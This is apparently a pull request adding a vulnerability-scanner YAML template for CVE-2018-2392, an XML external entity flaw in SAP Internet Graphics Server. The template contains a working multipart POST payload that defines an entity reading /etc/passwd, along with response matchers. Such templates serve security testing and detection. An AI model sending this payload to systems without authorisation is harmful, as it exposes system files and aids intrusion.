### PR TITLE
CVE-2018-2392 SAP IGS XXE

### DIFF
--- a/cves/2018/CVE-2018-2392.yaml
+++ b/cves/2018/CVE-2018-2392.yaml
@@ -1,0 +1,84 @@
+id: CVE-2018-2392
+
+info:
+  name: SAP Internet Graphics Server (IGS) XML External Entity
+  author: _generic_human_
+  severity: high
+  tags: cve,sap,igs,xxe,xmlchart
+  description: |
+    SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XXE vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
+  reference:
+    - https://launchpad.support.sap.com/#/notes/2525222
+    - https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/
+    - https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/
+    - https://troopers.de/troopers18/agenda/3r38lr/
+    - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb
+
+requests:
+  - raw:
+      - |
+        POST /XMLCHART HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary={{randstr_1}}
+
+        --{{randstr_1}}
+        Content-Disposition: form-data; name="{{randstr_2}}"; filename="{{randstr_3}}.xml"
+        Content-Type: application/xml
+
+        <?xml version='1.0' encoding='UTF-8'?>
+            <ChartData>
+              <Categories>
+                <Category>ALttP</Category>
+              </Categories>
+              <Series label="{{randstr_4}}">
+                <Point>
+                  <Value type="y">12345</Value>
+                </Point>
+              </Series>
+            </ChartData>
+        --{{randstr_1}}
+        Content-Disposition: form-data; name="{{randstr_5}}"; filename="{{randstr_6}}.xml"
+        Content-Type: application/xml
+
+        <?xml version='1.0' encoding='UTF-8'?>
+            <!DOCTYPE Extension [<!ENTITY xxe SYSTEM "/etc/passwd">]>
+            <SAPChartCustomizing version="1.1">
+              <Elements>
+                <ChartElements>
+                  <Title>
+                    <Extension>&xxe;</Extension>
+                  </Title>
+                </ChartElements>
+              </Elements>
+            </SAPChartCustomizing>
+        --{{randstr_1}}--
+
+      # file name - /etc/passwd
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Picture"
+          - "Info"
+          - "/output/"
+        part: body
+        condition: and
+
+      - type: word
+        words:
+          - "ImageMap"
+          - "Errors"
+        part: body
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "text/html"
+          - "SAP Internet Graphics Server"
+        part: header
+        condition: and

--- a/cves/2018/CVE-2018-2392.yaml
+++ b/cves/2018/CVE-2018-2392.yaml
@@ -4,7 +4,7 @@ info:
   name: SAP Internet Graphics Server (IGS) XML External Entity
   author: _generic_human_
   severity: high
-  tags: cve,sap,igs,xxe,xmlchart
+  tags: cve,cve2018,sap,igs,xxe,xmlchart
   description: |
     SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XXE vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.
   reference:


### PR DESCRIPTION
SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53 has two XXE vulnerabilities within the XMLCHART page - CVE-2018-2392 and CVE-2018-2393. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.

References:
- https://launchpad.support.sap.com/#/notes/2525222
- https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/
- https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/
- https://troopers.de/troopers18/agenda/3r38lr/
- https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb